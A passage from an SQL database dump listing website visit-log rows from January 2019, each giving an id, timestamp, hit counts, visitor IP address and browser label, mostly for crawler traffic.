','other'),(374763,1548081777,1,1,0,0,'54.36.148.190','other'),(374764,1548081801,1,1,0,0,'54.36.148.241','other'),(374765,1548081996,1,1,0,0,'46.229.168.142','other'),(374766,1548082205,1,1,0,0,'46.229.168.141','other'),(374767,1548082306,8,8,0,0,'216.244.66.241','other'),(374768,1548082310,1,1,0,0,'40.77.167.142','other'),(374769,1548082337,1,1,0,0,'91.196.178.187','chrome'),(374770,1548082430,2,2,0,0,'91.196.178.93','chrome'),(374771,1548082444,1,1,0,0,'54.36.148.139','other'),(374772,1548082657,2,2,0,0,'54.36.148.62','other'),(374773,1548082872,1,1,0,0,'54.36.148.33','other'),(374774,1548083068,2,2,0,0,'91.196.178.84','firefox'),(374775,1548083198,1,1,0,0,'54.36.148.185','other'),(374776,1548083341,1,1,0,0,'54.36.148.104','other'),(374777,1548083460,1,1,0,0,'54.36.148.241','other'),(374778,1548083554,1,1,0,0,'54.36.149.93','other'),(374779,1548083660,1,1,0,0,'66.249.73.28','chrome'),(374780,1548083661,1,1,0,0,'66.249.73.1','chrome'),(374781,1548083806,1,1,0,0,'54.36.148.210','other'),(374782,1548083810,1,1,0,0,'141.8.142.103','other'),(374783,1548083876,13,13,0,0,'216.244.66.241','other'),(374784,1548083883,1,1,0,0,'141.8.183.23','other'),(374785,1548083915,1,1,0,0,'54.36.149.26','other'),(374786,1548084347,1,1,0,0,'5.255.253.25','other'),(374787,1548084410,1,1,0,0,'54.36.148.112','other'),(374788,1548084414,1,1,0,0,'46.229.168.148','other'),(374789,1548084443,1,1,0,0,'178.154.171.69','other'),(374790,1548084496,1,1,0,0,'87.250.224.65','other'),(374791,1548084671,1,1,0,0,'54.36.148.41','other'),(374792,1548084705,1,1,0,0,'46.229.168.136','other'),(374793,1548084726,145,145,0,0,'5.9.88.113','other'),(374794,1548084770,49,49,0,0,'46.4.67.206','other'),(374795,1548084885,1,1,0,0,'91.196.178.101','chrome'),(374796,1548084893,1,1,0,0,'213.180.203.53','other'),(374797,1548084914,1,1,0,0,'141.8.142.144','other'),(374798,1548084990,1,1,0,0,'54.36.148.205','other'),(374799,1548085000,1,1,0,0,'46.229.168.146','other'),(374800,1548085104,1,1,0,0,'54.36.149.41','other'),(374801,1548085294,1,1,0,0,'54.36.148.120','other'),(374802,1548085387,1,1,0,0,'216.244.66.241','other'),(374803,1548085701,2,2,0,0,'40.77.167.151','other'),(374804,1548086082,1,1,0,0,'195.211.174.50','chrome'),(374805,1548086254,1,1,0,0,'46.211.111.172','chrome'),(374806,1548086386,1,1,0,0,'54.36.148.247','other'),(374807,1548086630,1,1,0,0,'35.192.84.7','other'),(374808,1548086662,7,7,0,0,'216.244.66.241','other'),(374809,1548086695,1,1,0,0,'54.36.148.160','other'),(374810,1548086719,1,1,0,0,'66.249.65.209','chrome'),(374811,1548086720,1,1,0,0,'66.249.65.194','chrome'),(374812,1548086762,1,1,0,0,'54.36.148.229','other'),(374813,1548086817,1,1,0,0,'54.36.149.46','other'),(374814,1548086926,1,1,0,0,'54.36.148.185','other'),(374815,1548087570,1,1,0,0,'54.36.148.159','other'),(374816,1548087650,2,2,0,0,'54.36.149.1','other'),(374817,1548087724,3,3,0,0,'216.244.66.241','other'),(374818,1548088032,1,1,0,0,'40.77.167.142','other'),(374819,1548088653,1,1,0,0,'193.200.241.230','other'),(374820,1548088707,1,1,0,0,'54.36.148.168','other'),(374821,1548088789,1,1,0,0,'54.36.148.49','other'),(374822,1548088884,1,1,0,0,'54.36.148.228','other'),(374823,1548089036,1,1,0,0,'54.36.148.32','other'),(374824,1548089091,1,1,0,0,'66.249.65.196','chrome'),(374825,1548089216,1,1,0,0,'54.36.148.215','other'),(374826,1548089295,3,3,0,0,'40.77.167.151','other'),(374827,1548089419,3,3,0,0,'216.244.66.241','other'),(374828,1548089436,1,1,0,0,'207.46.13.19','other'),(374829,1548089608,1,1,0,0,'8.29.198.25','other'),(374830,1548089637,1,1,0,0,'54.36.149.44','other'),(374831,1548089695,1,1,0,0,'5.45.207.19','other'),(374832,1548089713,1,1,0,0,'54.36.148.191','other'),(374833,1548089980,1,1,0,0,'66.249.73.5','chrome'),(374834,1548090011,1,1,0,0,'54.36.148.75','other'),(374835,1548090050,1,1,0,0,'40.77.167.142','other'),(374836,1548090483,9,9,0,0,'216.244.66.241','other'),(374837,1548090530,1,1,0,0,'54.36.148.35','other'),(374838,1548090741,1,1,0,0,'54.36.148.199','other'),(374839,1548090846,1,1,0,0,'54.36.149.57','other'),(374840,1548090888,1,1,0,0,'54.36.149.88','other'),(374841,1548091039,1,1,0,0,'207.46.13.46','other'),(374842,1548091293,1,1,0,0,'54.36.148.234','other'),(374843,1548091378,1,1,0,0,'8.29.198.26','other'),(374844,1548091392,1,1,0,0,'207.46.13.19','other'),(374845,1548091444,1,1,0,0,'54.36.148.214','other'),(374846,1548091622,1,1,0,0,'54.36.148.136','other'),(374847,1548091637,1,1,0,0,'54.36.149.61','other'),(374848,1548091688,1,1,0,0,'5.45.207.79','other'),(374849,1548091862,1,1,0,0,'54.36.149.106','other'),(374850,1548091869,1,1,0,0,'54.36.148.201','other'),(374851,1548092056,1,1,0,0,'54.36.148.224','other'),(374852,1548092148,1,1,0,0,'54.36.148.17','other'),(374853,1548092174,1,1,0,0,'54.36.148.254','other'),(374854,1548092184,6,6,0,0,'216.244.66.241','other'),(374855,1548092220,2,2,0,0,'40.77.167.142','other'),(374856,1548092699,1,1,0,0,'54.36.148.204','other'),(374857,1548092870,1,1,0,0,'54.36.148.203','other'),(374858,1548092989,2,2,0,0,'207.46.13.1','other'),(374859,1548093039,1,1,0,0,'54.36.148.175','other'),(374860,1548093105,7,7,0,0,'216.244.66.241','other'),(374861,1548093226,1,1,0,0,'54.36.148.75','other'),(374862,1548093251,1,1,0,0,'54.36.149.37','other'),(374863,1548093439,1,1,0,0,'54.36.149.62','other'),(374864,1548093727,1,1,0,0,'66.249.65.196','chrome'),(374865,1548093784,1,1,0,0,'54.36.149.20','other'),(374866,1548094504,1,1,0,0,'207.46.13.46','other'),(374867,1548094692,1,1,0,0,'54.36.149.76','other'),(374868,1548094736,1,1,0,0,'46.229.168.150','other'),(374869,1548094785,1,1,0,0,'54.36.149.0','other'),(374870,1548094847,2,2,0,0,'207.46.13.250','other'),(374871,1548094940,1,1,0,0,'54.36.149.47','other'),(374872,1548095126,1,1,0,0,'54.36.148.83','other'),(374873,1548095236,4,4,0,0,'216.244.66.241','other'),(374874,1548095264,1,1,0,0,'54.36.148.108','other'),(374875,1548095408,1,1,0,0,'66.249.65.209','chrome'),(374876,1548095409,1,1,0,0,'66.249.65.198','chrome'),(374877,1548095411,1,1,0,0,'46.229.168.133','other'),(374878,1548095668,1,1,0,0,'46.229.168.134','other'),(374879,1548095748,1,1,0,0,'157.55.39.122','other'),(374880,1548095902,1,1,0,0,'54.36.148.20','other'),(374881,1548095912,1,1,0,0,'54.186.49.84','firefox'),(374882,1548095941,1,1,0,0,'54.36.149.43','other'),(374883,1548095990,1,1,0,0,'207.46.13.250','other'),(374884,1548096041,1,1,0,0,'54.36.149.78','other'),(374885,1548096183,1,1,0,0,'54.36.149.96','other'),(374886,1548096188,6,6,0,0,'216.244.66.241','other'),(374887,1548096315,1,1,0,0,'54.36.148.189','other'),(374888,1548096502,1,1,0,0,'66.249.73.28','chrome'),(374889,1548096503,1,1,0,0,'66.249.73.30','chrome'),(374890,1548096747,1,1,0,0,'54.36.149.42','other'),(374891,1548096990,1,1,0,0,'54.36.148.74','other'),(374892,1548097032,1,1,0,0,'104.144.18.179','chrome'),(374893,1548097185,1,1,0,0,'54.36.148.69','other'),(374894,1548097195,1,1,0,0,'54.36.148.38','other'),(374895,1548097216,1,1,0,0,'54.36.148.19','other'),(374896,1548097248,1,1,0,0,'54.36.148.59','other'),(374897,1548097370,2,2,0,0,'141.8.142.103','other'),(374898,1548097374,1,1,0,0,'178.154.244.11','other'),(374900,1548097457,1,1,0,0,'54.36.149.101','other'),(374901,1548097571,1,1,0,0,'207.46.13.1','other'),(374902,1548097667,1,1,0,0,'66.249.65.198','chrome'),(374903,1548097672,4,4,0,0,'216.244.66.241','other'),(374904,1548097750,1,1,0,0,'54.36.148.119','other'),(374905,1548097853,1,1,0,0,'54.36.148.90','other'),(374906,1548098079,1,1,0,0,'207.46.13.250','other'),(374907,1548098238,1,1,0,0,'213.180.203.61','other'),(374908,1548098288,2,2,0,0,'157.55.39.202','other'),(374909,1548098602,9,9,0,0,'216.244.66.241','other'),(374910,1548098953,1,1,0,0,'66.249.73.31','chrome'),(374911,1548099024,1,1,0,0,'66.249.73.29','chrome'),(374912,1548099025,1,1,0,0,'66.249.73.1','chrome'),(374913,1548099061,1,1,0,0,'207.46.13.19','other'),(374914,1548099250,1,1,0,0,'54.36.149.99','other'),(374915,1548099311,1,1,0,0,'35.192.84.7','other'),(374916,1548099342,1,1,0,0,'157.55.39.202','other'),(374917,1548099397,1,1,0,0,'54.36.148.16','other'),(374918,1548099934,1,1,0,0,'207.46.13.250','other'),(374919,1548099945,1,1,0,0,'54.36.148.143','other'),(374920,1548100148,1,1,0,0,'54.36.149.82','other'),(374921,1548100436,1,1,0,0,'8.29.198.27','other'),(374922,1548100502,10,10,0,0,'216.244.66.241','other'),(374923,1548100577,1,1,0,0,'46.229.168.144','other'),(374924,1548100729,1,1,0,0,'54.36.148.83','other'),(374925,1548101050,1,1,0,0,'54.36.148.65','other'),(374926,1548101767,2,2,0,0,'216.244.66.241','other'),(374927,1548101850,2,2,0,0,'46.229.168.152','other'),(374928,1548102157,1,1,0,0,'46.229.168.151','other'),(374929,1548102236,1,1,0,0,'8.29.198.26','other'),(374930,1548102276,1,1,0,0,'54.36.148.149','other'),(374931,1548102449,1,1,0,0,'46.229.168.138','other'),(374932,1548102665,1,1,0,0,'54.36.149.57','other'),(374933,1548102734,1,1,0,0,'54.36.149.0','other'),(374934,1548102751,1,1,0,0,'54.36.148.139','other'),(374935,1548102802,1,1,0,0,'54.36.148.153','other'),(374936,1548103212,10,10,0,0,'216.244.66.241','other'),(374937,1548103271,1,1,0,0,'54.36.148.132','other'),(374938,1548104018,1,1,0,0,'66.249.75.155','chrome'),(374939,1548104142,7,7,0,0,'157.55.39.202','other'),(374940,1548104204,7,7,0,0,'207.46.13.250','other'),(374941,1548104212,1,1,0,0,'46.229.168.130','other'),(374942,1548104214,1,1,0,0,'46.229.168.141','other'),(374943,1548104245,1,1,0,0,'66.249.75.140','chrome'),(374944,1548104400,1,1,0,0,'54.36.149.38','other'),(374945,1548104671,1,1,0,0,'54.36.148.157','other'),(374946,1548104819,1,1,0,0,'54.36.149.74','other'),(374947,1548104910,1,1,0,0,'54.36.148.127','other'),(374948,1548104967,6,6,0,0,'207.46.13.19','other'),(374949,1548105035,1,1,0,0,'54.36.149.27','other'),(374950,1548105096,1,1,0,0,'54.36.148.78','other'),(374951,1548105341,1,1,0,0,'54.36.148.98','other'),(374952,1548105559,1,1,0,0,'54.36.148.74','other'),(374953,1548105596,1,1,0,0,'157.55.39.202','other'),(374954,1548105996,3,3,0,0,'216.244.66.241','other'),(374955,1548106056,1,1,0,0,'66.249.75.157','chrome'),(374956,1548106057,1,1,0,0,'66.249.75.140','chrome'),(374957,1548106318,1,1,0,0,'54.36.148.254','other'),(374958,1548106361,1,1,0,0,'54.36.149.78','other'),(374959,1548106678,1,1,0,0,'54.36.148.170','other'),(374960,1548106679,1,1,0,0,'46.229.168.139','other'),(374961,1548106698,1,1,0,0,'54.36.148.65','other'),(374962,1548106719,1,1,0,0,'54.36.148.71','other'),(374963,1548106848,1,1,0,0,'46.229.168.147','other'),(374964,1548106929,1,1,0,0,'54.36.149.17','other'),(374965,1548106973,8,8,0,0,'216.244.66.241','other'),(374966,1548107076,1,1,0,0,'54.36.148.174','other'),(374967,1548107248,1,1,0,0,'46.229.168.132','other'),(374968,1548107265,1,1,0,0,'54.36.148.103','other'),(374969,1548107655,1,1,0,0,'46.229.168.138','other'),(374970,1548107867,1,1,0,0,'207.46.13.250','other'),(374971,1548108036,2,2,0,0,'91.209.11.236','other'),(374972,1548108321,1,1,0,0,'54.36.148.209','other'),(374973,1548108430,2,2,0,0,'157.55.39.182','other'),(374974,1548108769,9,9,0,0,'216.244.66.241','other'),(374975,1548108801,1,1,0,0,'66.249.75.15','chrome'),(374977,1548109045,1,1,0,0,'54.36.148.47','other'),(374978,1548109307,1,1,0,0,'54.36.149.87','other'),(374979,1548109417,1,1,0,0,'13.66.139.0','other'),(374980,1548109675,5,5,0,0,'216.244.66.241','other'),(374981,1548109833,1,1,0,0,'66.249.75.17','chrome'),(374983,1548110318,1,1,0,0,'54.36.149.66','other'),(374984,1548110592,1,1,0,0,'54.36.149.61','other'),(374985,1548110600,1,1,0,0,'66.249.75.140','chrome'),(374986,1548110767,1,1,0,0,'54.36.148.143','other'),(374987,1548110797,1,1,0,0,'54.36.148.112','other'),(374988,1548110862,1,1,0,0,'54.36.148.80','other'),(374989,1548110890,1,1,0,0,'54.36.148.207','other'),(374990,1548110900,1,1,0,0,'46.229.168.145','other'),(374991,1548111261,1,1,0,0,'8.29.198.27','other'),(374992,1548111316,1,1,0,0,'54.36.148.94','other'),(374993,1548111357,1,1,0,0,'54.36.148.140','other'),(374994,1548111386,1,1,0,0,'213.180.203.40','other'),(374995,1548111549,6,6,0,0,'216.244.66.241','other'),(374996,1548111595,1,1,0,0,'54.36.149.106','other'),(374997,1548111635,1,1,0,0,'5.45.207.19','other'),(374998,1548111645,1,1,0,0,'46.229.168.142','other'),(374999,1548111711,1,1,0,0,'54.36.148.61','other'),(375000,1548111724,1,1,0,0,'213.180.203.17','other'),(375001,1548111854,1,1,0,0,'5.45.207.8','other'),(375002,1548111918,1,1,0,0,'141.8.142.103','other'),(375003,1548112098,1,1,0,0,'54.36.148.76','other'),(375004,1548112131,1,1,0,0,'54.36.148.90','other'),(375005,1548112154,1,1,0,0,'141.8.183.23','other'),(375006,1548112253,1,1,0,0,'54.36.148.176','other'),(375007,1548112263,1,1,0,0,'54.36.149.12','other'),(375008,1548112424,1,1,0,0,'37.9.113.103','other'),(375009,1548112489,1,1,0,0,'216.244.66.241','other'),(375010,1548112505,1,1,0,0,'54.36.149.93','other'),(375011,1548112677,1,1,0,0,'54.36.148.164','other'),(375012,1548112742,1,1,0,0,'54.36.148.37','other'),(375013,1548112854,1,1,0,0,'66.249.75.20','chrome'),(375014,1548112884,1,1,0,0,'66.249.75.22','chrome'),(375015,1548112894,1,1,0,0,'66.249.75.16','chrome'),(375016,1548112895,1,1,0,0,'66.249.75.21','chrome'),(375017,1548113091,1,1,0,0,'8.29.198.27','other'),(375018,1548113145,1,1,0,0,'54.36.148.76','other'),(375019,1548113175,1,1,0,0,'54.36.149.67','other'),(375020,1548113659,1,1,0,0,'54.36.149.19','other'),(375021,1548113889,1,1,0,0,'54.36.148.240','other'),(375022,1548114064,1,1,0,0,'54.36.149.56','other'),(375023,1548114068,1,1,0,0,'54.36.148.126','other'),(375024,1548114137,1,1,0,0,'157.55.39.202','other'),(375025,1548114286,1,1,0,0,'54.36.148.53','other'),(375026,1548114311,1,1,0,0,'54.36.149.66','other'),(375027,1548114320,1,1,0,0,'178.154.200.48','other'),(375028,1548114323,1,1,0,0,'178.154.244.11','other'),(375029,1548114334,7,7,0,0,'216.244.66.241','other'),(375030,1548114431,1,1,0,0,'66.102.9.60','chrome'),(375031,1548114478,1,1,0,0,'54.36.148.78','other'),(375032,1548114617,1,1,0,0,'54.36.148.197','other'),(375033,1548114899,1,1,0,0,'46.229.168.129','other'),(375034,1548114901,1,1,0,0,'46.229.168.149','other'),(375035,1548114913,1,1,0,0,'54.36.148.37','other'),(375036,1548114961,1,1,0,0,'66.249.75.20','chrome'),(375037,1548115416,2,2,0,0,'216.244.66.241','other'),(375038,1548115538,1,1,0,0,'54.36.148.169','other'),(375039,1548115695,1,1,0,0,'54.36.148.210','other'),(375040,1548115795,1,1,0,0,'54.36.148.212','other'),(375041,1548115984,1,1,0,0,'54.36.148.151','other'),(375042,1548116306,1,1,0,0,'54.36.148.207','other'),(375043,1548116388,1,1,0,0,'157.55.39.182','other'),(375044,1548116402,1,1,0,0,'54.36.148.190','other'),(375045,1548116523,1,1,0,0,'54.36.149.99','other'),(375046,1548116574,1,1,0,0,'66.249.75.142','chrome'),(375047,1548116634,1,1,0,0,'54.36.148.195','other'),(375048,1548116996,1,1,0,0,'54.36.148.133','other'),(375049,1548117100,15,15,0,0,'216.244.66.241','other'),(375050,1548117276,1,1,0,0,'54.36.148.112','other'),(375051,1548117279,1,1,0,0,'54.36.148.86','other'),(375052,1548117441,1,1,0,0,'66.249.75.22','chrome'),(375053,1548117501,1,1,0,0,'54.36.148.198','other'),(375054,1548117516,1,1,0,0,'46.229.168.151','other'),(375055,1548117683,1,1,0,0,'46.229.168.146','other'),(375056,1548118090,4,4,0,0,'216.244.66.241','other'),(375057,1548118126,1,1,0,0,'54.36.148.45','other'),(375058,1548118135,1,1,0,0,'54.36.148.221','other'),(375059,1548118200,1,1,0,0,'54.36.149.12','other'),(375060,1548118544,1,1,0,0,'54.36.148.206','other'),(375061,1548118769,1,1,0,0,'54.36.149.106','other'),(375062,1548119031,1,1,0,0,'66.249.75.17','chrome'),(375063,1548119032,1,1,0,0,'66.249.75.22','chrome'),(375064,1548119163,1,1,0,0,'66.249.75.16','chrome'),(375065,1548119164,1,1,0,0,'66.249.75.21','chrome'),(375066,1548119249,1,1,0,0,'54.36.149.5','other'),(375067,1548119260,1,1,0,0,'54.36.148.105','other'),(375068,1548119433,1,1,0,0,'157.55.39.182','other'),(375069,1548119477,1,1,0,0,'46.229.168.145','other'),(375070,1548119590,1,1,0,0,'54.36.149.88','other'),(375071,1548119635,1,1,0,0,'54.36.149.58','other'),(375072,1548119699,1,1,0,0,'54.36.148.180','other'),(375073,1548119791,1,1,0,0,'66.249.75.153','chrome'),(375074,1548119792,1,1,0,0,'66.249.75.142','chrome'),(375075,1548119892,6,6,0,0,'216.244.66.241','other'),(375076,1548120002,2,2,0,0,'54.184.2.242','chrome'),(375077,1548120066,1,1,0,0,'157.55.39.107','other'),(375078,1548120115,1,1,0,0,'54.36.148.251','other'),(375079,1548120381,1,1,0,0,'54.36.149.13','other'),(375080,1548120703,1,1,0,0,'54.36.149.9','other'),(375081,1548121084,2,2,0,0,'216.244.66.241','other'),(375082,1548121201,1,1,0,0,'54.36.148.22','other'),(375083,1548121311,1,1,0,0,'157.55.39.182','other'),(375084,1548121348,1,1,0,0,'54.36.149.97','other'),(375085,1548121390,1,0,1,0,'66.249.75.153',''),(375086,1548121401,1,0,1,0,'66.249.75.140',''),(375087,1548121439,1,1,0,0,'54.36.148.176','other'),(375088,1548121880,1,1,0,0,'54.36.149.50','other'),(375089,1548122093,1,1,0,0,'8.29.198.25','other'),(375090,1548122558,1,1,0,0,'54.36.148.125','other'),(375091,1548122614,1,1,0,0,'54.36.149.91','other'),(375092,1548122635,1,1,0,0,'54.36.149.8','other'),(375093,1548122652,1,1,0,0,'54.36.149.59','other'),(375094,1548122698,6,6,0,0,'216.244.66.241','other'),(375095,1548122806,1,1,0,0,'54.36.149.102','other'),(375096,1548122964,1,1,0,0,'54.36.148.189','other'),(375097,1548123146,1,1,0,0,'54.36.148.88','other'),(375098,1548123419,1,1,0,0,'54.36.149.107','other'),(375099,1548123461,1,1,0,0,'54.36.149.9','other'),(375100,1548123632,3,3,0,0,'216.244.66.241','other'),(375101,1548123898,1,1,0,0,'46.229.168.137','other'),(375102,1548123941,1,1,0,0,'8.29.198.26','other'),(375103,1548124031,1,1,0,0,'54.36.148.24','other'),(375104,1548124435,1,1,0,0,'54.36.148.29','other'),(375105,1548124571,1,1,0,0,'66.249.75.16','chrome'),(375106,1548124572,1,1,0,0,'66.249.75.21','chrome'),(375107,1548124632,1,1,0,0,'66.249.75.17','chrome'),(375109,1548124699,1,1,0,0,'54.36.149.75','other'),(375110,1548124908,1,1,0,0,'54.36.148.117','other'),(375111,1548124967,1,1,0,0,'54.36.148.60','other'),(375112,1548125073,1,1,0,0,'209.17.96.66','other'),(375113,1548125207,1,1,0,0,'157.55.39.182','other'),(375114,1548125507,9,9,0,0,'216.244.66.241','other'),(375115,1548125612,1,1,0,0,'54.36.149.8','other'),(375116,1548125616,1,1,0,0,'54.36.148.135','other'),(375118,1548125875,1,1,0,0,'46.229.168.148','other'),(375119,1548125904,1,1,0,0,'54.36.148.245','other'),(375120,1548125997,1,1,0,0,'54.36.148.174','other'),(375121,1548126070,2,2,0,0,'40.77.167.204','other'),(375122,1548126153,1,1,0,0,'54.36.149.34','other'),(375123,1548126257,1,1,0,0,'54.36.148.209','other'),(375124,1548126323,1,1,0,0,'66.249.75.153','chrome'),(375125,1548126324,1,1,0,0,'66.249.75.140','chrome'),(375126,1548126410,2,2,0,0,'207.46.13.250','other'),(375127,1548126574,5,5,0,0,'216.244.66.241','other'),(375128,1548127033,1,1,0,0,'54.36.149.75','other'),(375129,1548127079,1,1,0,0,'54.36.148.14','other'),(375130,1548127348,1,1,0,0,'66.249.75.153','chrome'),(375131,1548127349,1,1,0,0,'66.249.75.140','chrome'),(375132,1548127356,1,1,0,0,'66.249.75.20','chrome'),(375133,1548127424,1,1,0,0,'46.229.168.151','other'),(375134,1548127508,1,1,0,0,'207.241.229.31','other'),(375135,1548127650,1,1,0,0,'54.36.148.185','other'),(375136,1548127704,1,1,0,0,'207.46.13.228','other'),(375137,1548127986,1,1,0,0,'54.36.148.26','other'),(375138,1548128107,2,2,0,0,'54.36.148.215','other'),(375139,1548128181,2,2,0,0,'37.9.113.103','other'),(375140,1548128247,2,2,0,0,'178.154.244.11','other'),(375141,1548128301,9,9,0,0,'216.244.66.241','other'),(375142,1548128357,1,1,0,0,'171.67.70.39','other'),(375143,1548128546,1,1,0,0,'54.36.148.154','other'),(375144,1548128634,1,1,0,0,'54.36.148.208','other'),(375145,1548128692,1,1,0,0,'54.36.148.186','other'),(375146,1548128803,1,1,0,0,'54.36.148.78','other'),(375147,1548128807,1,1,0,0,'87.250.224.47','other'),(375148,1548128813,1,1,0,0,'54.36.148.48','other'),(375149,1548129294,3,3,0,0,'216.244.66.241','other'),(375150,1548129317,1,1,0,0,'54.36.149.13','other'),(375151,1548129374,1,1,0,0,'40.77.167.173','other'),(375152,1548129402,1,1,0,0,'54.36.149.99','other'),(375153,1548129772,1,1,0,0,'54.36.148.156','other'),(375154,1548129806,1,1,0,0,'46.229.168.151','other'),(375155,1548129914,1,1,0,0,'54.36.148.170','other'),(375156,1548130133,1,1,0,0,'54.36.148.67','other'),(375157,1548130200,1,1,0,0,'54.36.149.72','other'),(375158,1548130247,1,1,0,0,'54.36.148.216','other'),(375159,1548130265,1,1,0,0,'54.36.148.181','other'),(375160,1548130301,1,1,0,0,'40.77.167.173','other'),(375161,1548130305,1,1,0,0,'66.249.75.15','chrome'),(375162,1548130306,1,1,0,0,'66.249.75.20','chrome'),(375163,1548130334,1,1,0,0,'54.36.149.93','other'),(375164,1548130439,1,1,0,0,'54.36.148.124','other'),(375165,1548130497,1,1,0,0,'5.45.207.79','other'),(375166,1548130510,1,1,0,0,'54.36.148.35','other'),(375167,1548130559,1,1,0,0,'157.55.39.107','other'),(375168,1548130573,1,1,0,0,'54.36.149.63','other'),(375169,1548130575,2,2,0,0,'5.45.207.19','other'),(375170,1548130783,1,1,0,0,'54.36.148.79','other'),(375171,1548130795,1,1,0,0,'54.36.148.214','other'),(375172,1548130804,2,2,0,0,'178.154.244.11','other'),(375173,1548131068,1,1,0,0,'54.36.149.107','other'),(375174,1548131101,2,2,0,0,'216.244.66.241','other'),(375175,1548131326,1,1,0,0,'54.36.149.19','other'),(375176,1548131327,1,1,0,0,'54.36.148.138','other'),(375177,1548131734,2,2,0,0,'178.154.244.11','other'),(375178,1548131790,1,1,0,0,'54.36.148.39','other'),(375179,1548131875,1,1,0,0,'66.249.75.144','chrome'),(375180,1548131964,1,1,0,0,'54.36.148.40','other'),(375181,1548132109,1,1,0,0,'37.9.113.103','other'),(375182,1548132258,1,1,0,0,'54.36.149.14','other'),(375183,1548132265,1,1,0,0,'37.9.113.148','other'),(375184,1548132519,4,4,0,0,'216.244.66.241','other'),(375185,1548132715,2,2,0,0,'5.45.207.79','other'),(375186,1548132888,1,1,0,0,'54.36.148.104','other'),(375187,1548132922,1,1,0,0,'8.29.198.25','other'),(375188,1548132941,1,1,0,0,'66.249.75.17','chrome'),(375189,1548132943,1,1,0,0,'66.249.75.20','chrome'),(375190,1548133078,1,1,0,0,'102.165.49.115','other'),(375191,1548133159,1,1,0,0,'54.36.148.16','other'),(375192,1548133466,2,2,0,0,'40.77.167.204','other'),(375193,1548133552,1,1,0,0,'141.8.142.103','other'),(375194,1548133880,4,4,0,0,'216.244.66.241','other'),(375195,1548133994,1,1,0,0,'54.36.148.99','other'),(375196,1548134111,1,1,0,0,'54.36.148.201','other'),(375197,1548134171,1,1,0,0,'46.229.168.153','other'),(375198,1548134318,1,1,0,0,'54.36.148.80','other'),(375199,1548134459,1,1,0,0,'54.36.149.59','other'),(375200,1548134467,1,1,0,0,'54.36.149.102','other'),(375201,1548134777,1,1,0,0,'8.29.198.26','other'),(375202,1548134886,13,13,0,0,'216.244.66.241','other'),(375203,1548134935,1,1,0,0,'54.36.149.70','other'),(375204,1548135489,2,2,0,0,'51.15.59.9','other'),(375205,1548135546,1,1,0,0,'54.36.148.61','other'),(375206,1548135727,1,1,0,0,'54.36.148.120','other'),(375207,1548135801,1,1,0,0,'54.36.148.219','other'),(375208,1548135829,2,2,0,0,'216.244.66.241','other'),(375209,1548135912,8,8,0,0,'5.9.156.20','other'),(375210,1548135961,1,1,0,0,'54.36.149.29','other'),(375211,1548135980,49,49,0,0,'151.80.41.169','other'),(375212,1548136146,18,18,0,0,'148.251.195.14','other'),(375213,1548136221,1,1,0,0,'157.55.39.107','other'),(375214,1548136810,1,1,0,0,'54.36.148.53','other'),(375215,1548137072,5,5,0,0,'216.244.66.241','other'),(375216,1548137193,1,1,0,0,'54.36.149.48','other'),(375217,1548137511,1,1,0,0,'54.36.149.35','other'),(375218,1548137587,1,1,0,0,'54.36.148.234','other'),(375219,1548137630,1,1,0,0,'194.247.42.212','chrome'),(375220,1548137998,1,1,0,0,'54.36.148.40','other'),(375221,1548138319,1,1,0,0,'46.229.168.137','other'),(375222,1548138324,7,7,0,0,'216.244.66.241','other'),(375223,1548138629,1,1,0,0,'54.36.149.93','other'),(375224,1548138681,1,1,0,0,'54.36.148.57','other'),(375225,1548138884,1,1,0,0,'54.36.148.107','other'),(375226,1548139130,1,1,0,0,'66.249.75.21','chrome'),(375227,1548139281,1,1,0,0,'54.36.149.61','other'),(375228,1548139440,3,3,0,0,'91.196.178.88','chrome'),(375229,1548139545,3,3,0,0,'216.244.66.241','other'),(375230,1548139746,1,1,0,0,'54.36.148.20','other'),(375231,1548139752,1,1,0,0,'91.196.178.163','chrome'),(375232,1548139927,1,1,0,0,'180.76.15.144','other'),(375233,1548139970,1,1,0,0,'207.46.13.228','other'),(375234,1548140144,1,1,0,0,'54.36.148.159','other'),(375235,1548140203,1,1,0,0,'66.249.69.150','chrome'),(375236,1548140288,1,1,0,0,'54.36.148.118','other'),(375237,1548140414,2,2,0,0,'91.196.178.88','chrome'),(375238,1548140630,5,5,0,0,'216.244.66.241','other'),(375239,1548140942,2,2,0,0,'207.46.13.228','other'),(375240,1548140985,1,1,0,0,'91.196.178.163','chrome'),(375241,1548141065,1,1,0,0,'54.36.149.91','other'),(375242,1548141079,1,1,0,0,'54.36.149.40','other'),(375243,1548141207,2,2,0,0,'178.92.171.211','chrome'),(375244,1548141261,1,1,0,0,'40.77.167.183','other'),(375245,1548141647,1,1,0,0,'95.28.3.160','chrome'),(375246,1548141648,1,1,0,0,'37.145.186.209','chrome'),(375247,1548141735,1,1,0,0,'54.36.149.89','other'),(375248,1548141762,1,1,0,0,'54.36.148.132','other'),(375249,1548141764,1,1,0,0,'54.36.149.47','other'),(375250,1548141950,1,1,0,0,'95.134.220.95','chrome'),(375251,1548141953,1,1,0,0,'54.36.148.169','other'),(375252,1548142175,4,4,0,0,'216.244.66.241','other'),(375253,1548142233,1,1,0,0,'54.36.148.55','other'),(375254,1548142304,1,1,0,0,'46.229.168.138','other'),(375255,1548142358,1,1,0,0,'54.36.148.160','other'),(375256,1548142395,1,1,0,0,'40.77.167.105','other'),(375257,1548142724,1,1,0,0,'66.249.69.145','chrome'),(375258,1548142725,1,1,0,0,'66.249.69.149','chrome'),(375259,1548142780,1,1,0,0,'54.36.149.79','other'),(375260,1548143423,1,1,0,0,'54.36.148.95','other'),(375261,1548143436,1,1,0,0,'95.132.57.167','chrome'),(375262,1548143608,1,1,0,0,'54.36.148.142','other'),(375263,1548143687,1,1,0,0,'54.36.149.78','other'),(375264,1548143726,2,2,0,0,'216.244.66.241','other'),(375265,1548143751,1,1,0,0,'8.29.198.27','other'),(375266,1548143785,2,2,0,0,'77.111.246.62','chrome'),(375267,1548143805,1,1,0,0,'54.36.148.139','other'),(375268,1548143828,1,1,0,0,'54.36.149.107','other'),(375269,1548143884,1,1,0,0,'91.242.162.44','other'),(375270,1548144010,1,1,0,0,'54.36.148.54','other'),(375271,1548144014,1,1,0,0,'54.36.148.237','other'),(375272,1548144032,1,1,0,0,'207.46.13.228','other'),(375273,1548144372,1,1,0,0,'216.108.231.130','other'),(375274,1548144722,1,1,0,0,'54.36.148.91','other'),(375275,1548144818,1,1,0,0,'54.36.148.179','other'),(375276,1548144938,8,8,0,0,'216.244.66.241','other'),(375277,1548145190,1,1,0,0,'54.36.148.185','other'),(375278,1548145233,1,1,0,0,'54.36.148.60','other'),(375279,1548145545,1,1,0,0,'54.36.149.54','other'),(375280,